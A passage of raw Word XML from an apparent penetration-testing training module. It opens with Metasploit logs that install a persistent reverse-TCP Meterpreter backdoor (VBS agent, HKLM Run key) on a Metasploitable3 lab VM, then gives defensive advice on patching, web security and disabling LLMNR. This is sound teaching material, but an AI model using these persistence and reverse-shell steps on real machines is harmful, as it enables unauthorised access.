    </w:p>
    <w:p w14:paraId="32CA09E6" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEA9858" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Running Persistence Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E32F00" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Resource file for cleanup created at /root/.msf4/logs/persistence/METASPLOITABLE3_20180705.3840/METASPLOITABLE3_20180705.3840.rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438EF455" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.21.10 LPORT=1338</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4038D8" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Persistent agent script is 99631 bytes long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D199BF" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Persistent Script written to C:\Windows\SERVIC~2\LOCALS~1\AppData\Local\Temp\BduMunbhqqaRd.vbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64042813" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[*] Executing script C:\Windows\SERVIC~2\LOCALS~1\AppData\Local\Temp\BduMunbhqqaRd.vbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E824C21" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Agent executed with PID 5112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF3EB1" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\eDUEJzvmDxF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F805B" w14:textId="4E823775" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\eDUEJz</w:t>
      </w:r>
      <w:r w:rsidR="00C82D00">
        <w:t>vmDxF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C79777" w14:textId="77777777" w:rsidR="008679E5" w:rsidRDefault="008679E5" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDBE166" w14:textId="1966DA0B" w:rsidR="00241837" w:rsidRPr="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>To demonstrate that it works, we reboot the machine and start a</w:t>
      </w:r>
      <w:r w:rsidR="009E6953">
        <w:t xml:space="preserve"> handler for a reverse tcp meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CBE36C" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E08133" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Rebooting...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC948A2" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF45728" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Shutting down Meterpreter...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C04703" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787121BE" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 192.168.22.30 - Meterpreter session 19 closed.  Reason: User exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DB6176" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(windows/local/payload_inject) &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C044FC5" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C753FF6" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PAYLOAD =&gt; windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923A2E6" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D25EC" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A14BCCF" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module options (exploit/multi/handler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BFE3C" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0374FDA5" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name  Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A335F1C" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----  ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD4898A" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AD6133" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5176DB36" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Payload options (windows/meterpreter/reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C47FDB" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2869DB36" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name      Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000B7A9E" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----      ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536BA443" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63898644" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LHOST     192.168.21.10    yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0C3B5" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LPORT     1337             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0890CAE7" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C4B2B8" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56091C87" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36983F29" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09BBD2C0" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0590D4D6" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2041DB5A" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   0   Wildcard Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1988DBB9" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3261FB62" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F5BAC3" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; set LPORT 1338</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350AB4B7" w14:textId="73EF94ED" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LPORT =&gt; 1338</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A16B080" w14:textId="77777777" w:rsidR="008679E5" w:rsidRDefault="008679E5" w:rsidP="00C82D00">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4931398A" w14:textId="07001AF4" w:rsidR="00C82D00" w:rsidRPr="00C82D00" w:rsidRDefault="00C82D00" w:rsidP="00C82D00">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>On user login, a Meterpreter session is opened:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C39D47" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>msf exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975B3F7" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4385D848" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Started reverse TCP handler on 192.168.21.10:1338</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C71BED" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Sending stage (179779 bytes) to 192.168.22.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7186F76F" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Meterpreter session 20 opened (192.168.21.10:1338 -&gt; 192.168.22.30:49294) at 2018-07-05 04:42:44 -0500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CF6133" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD0BAEA" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419F9799" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Computer        : METASPLOITABLE3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22879456" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>OS              : Windows 2008 R2 (Build 7601, Service Pack 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46527338" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Architecture    : x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641B0C39" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>System Language : en_US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0E196" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain          : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB3380" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logged On Users : 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA14A7C" w14:textId="7E243D92" w:rsidR="00596725" w:rsidRDefault="00241837" w:rsidP="00596725">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter     : x86/windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5B07C5" w14:textId="7EA81B3A" w:rsidR="009C0E4F" w:rsidRDefault="009C0E4F" w:rsidP="009C0E4F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12298EA9" w14:textId="54441F31" w:rsidR="009C0E4F" w:rsidRDefault="009C0E4F" w:rsidP="009C0E4F">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">                MORE INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D7709" w14:textId="6146D562" w:rsidR="009C0E4F" w:rsidRDefault="00124E5B" w:rsidP="009C0E4F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>While it is still possible to launch a nc listening for incoming connections, this is not a secure option for a backdoor as anyone can connect to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586C5B74" w14:textId="572DB832" w:rsidR="00124E5B" w:rsidRDefault="00124E5B" w:rsidP="009C0E4F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Ncat is a more fully featured version of netcat that can for instance limit connections t</w:t>
      </w:r>
      <w:r w:rsidR="00267B5E">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only some IP address</w:t>
      </w:r>
      <w:r w:rsidR="00267B5E">
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10004CC7" w14:textId="7BC3FAF2" w:rsidR="00267B5E" w:rsidRPr="009C0E4F" w:rsidRDefault="00267B5E" w:rsidP="009C0E4F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Secure Back Door (sdb) is another tool to restrict access with password, shared keys…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1290767E" w14:textId="0B8F5521" w:rsidR="005277D0" w:rsidRDefault="00583BA1" w:rsidP="00D532B9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc26269452"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>How to protect yourself</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="039D53A0" w14:textId="376B6905" w:rsidR="00073A80" w:rsidRDefault="00073A80" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Prevent an attacker from getting a shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA8AF4C" w14:textId="5484B81F" w:rsidR="001B6904" w:rsidRDefault="001B6904" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Patch your system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02986D0F" w14:textId="582AD041" w:rsidR="001B6904" w:rsidRPr="001B6904" w:rsidRDefault="001B6904" w:rsidP="001B6904">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Having up to date and patched server</w:t>
      </w:r>
      <w:r w:rsidR="008679E5">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will prevent </w:t>
      </w:r>
      <w:r w:rsidR="00C53231">
        <w:t>many</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00C53231">
        <w:t xml:space="preserve"> This training showed how easy it </w:t>
      </w:r>
      <w:r w:rsidR="00657554">
        <w:t>is to detect known vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00C53231">
        <w:t xml:space="preserve"> with scanners such as Nessus and the</w:t>
      </w:r>
      <w:r w:rsidR="007D0F0E">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00C53231">
        <w:t xml:space="preserve"> to exploit them with Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00943CEF">
        <w:t xml:space="preserve"> for instance</w:t>
      </w:r>
      <w:r w:rsidR="00C53231">
        <w:t>. Even kids can (and might) do it.</w:t>
      </w:r>
      <w:r w:rsidR="00943CEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C42F31">
        <w:t xml:space="preserve"> Do not expose services that </w:t>
      </w:r>
      <w:r w:rsidR="00802CDF">
        <w:t>do not need to be publicly available</w:t>
      </w:r>
      <w:r w:rsidR="00C42F31">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AA4158">
        <w:t xml:space="preserve"> Use F</w:t>
      </w:r>
      <w:r w:rsidR="001C1211">
        <w:t>irewall whenever it is possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFFD4C4" w14:textId="7707BE08" w:rsidR="00073A80" w:rsidRDefault="00073A80" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Protect yourself from web vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732CB813" w14:textId="7F93FE72" w:rsidR="008E2E5B" w:rsidRDefault="003E1CD5" w:rsidP="00073A80">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Web applications or websites are often open to everyone and might be a great attack vector for a malicious user. As demonstrated by the first hands-on of this module, the impact of a web vulnerability is not limited to the web server. An attacker can reach new machine once he has compromised the web server.</w:t>
      </w:r>
      <w:r w:rsidR="008E2E5B">
        <w:t xml:space="preserve"> That is why it is important to protect web servers. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202053F2" w14:textId="7707B295" w:rsidR="008E2E5B" w:rsidRDefault="008E2E5B" w:rsidP="00073A80">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Even if some application require a new architecture to become secure, other tips can improve the security level of the company. For example, one can give access to certain functionality only to those who have a VPN access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0215551E" w14:textId="5C93A343" w:rsidR="00C473B6" w:rsidRDefault="00556937" w:rsidP="00073A80">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Applications might also be tested (e.g. by pen testers) to detect vulnerability before the application is deployed in a production environment.</w:t>
      </w:r>
      <w:r w:rsidR="00BF33EB">
        <w:t xml:space="preserve"> This can prevent attacker to bypass input validation that are trusted by developer as they are provided by frameworks (such as .NET).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442AD7DB" w14:textId="202FA44F" w:rsidR="00C473B6" w:rsidRDefault="00C473B6" w:rsidP="00073A80">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>User authentication is another tricky area as valid users can sometimes be brute-forced. The more users the site has, the more it is vulnerable to</w:t>
      </w:r>
      <w:r w:rsidR="00453D55">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>brute-force enumeration.</w:t>
      </w:r>
      <w:r w:rsidR="00453D55">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE5695">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C51AEB">
        <w:t>Captcha can be added to authentication to prevent brute-force.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBF1FBF" w14:textId="73E48BE6" w:rsidR="000C3B79" w:rsidRDefault="000C3B79" w:rsidP="00073A80">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Do not left error pages in place as they provide an attacker with plenty information and allow him to enumerate a database easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D7DD82" w14:textId="35D1CE64" w:rsidR="002E307C" w:rsidRPr="00073A80" w:rsidRDefault="002E307C" w:rsidP="00073A80">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Last but not least, use web application firewall and/or modules to improve the global security level. Apache provides some modules that can prevent (or at least try to) attacks like SQL injections, DDOS, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D784D" w14:textId="5B98A0F1" w:rsidR="009302A1" w:rsidRDefault="009302A1" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mitigate network attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707C2521" w14:textId="5FE174DB" w:rsidR="00E1134E" w:rsidRDefault="00E1134E" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Prevent LLMNR and NBT-NS poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674CD4F1" w14:textId="2A5AB7BB" w:rsidR="00E1134E" w:rsidRDefault="007126EF" w:rsidP="00E1134E">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r w:rsidRPr="007126EF">
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> easier way to defend against LLMNR and NBT-NS poisoning is to disable this two protocols:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7547474A" w14:textId="0062405A" w:rsidR="007126EF" w:rsidRDefault="007126EF" w:rsidP="00E1134E">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To disable LLMNR, open the Group Policy Editor and find </w:t>
      </w:r>
      <w:r w:rsidR="008F22FF">
        <w:t>the “</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DNS client” property. Make sure that “Turn Off multicast Name </w:t>
      </w:r>
      <w:r w:rsidR="008F22FF">
        <w:t>Resolution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” is </w:t>
      </w:r>
      <w:r w:rsidR="00660562">
        <w:t xml:space="preserve">set to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">enabled. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544B7591" w14:textId="19E0A7C5" w:rsidR="00C147CE" w:rsidRPr="00E1134E" w:rsidRDefault="00C147CE" w:rsidP="00E1134E">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disabling NBT-NS is </w:t>
      </w:r>
      <w:r w:rsidR="008E0497">
        <w:t>achieved</w:t>
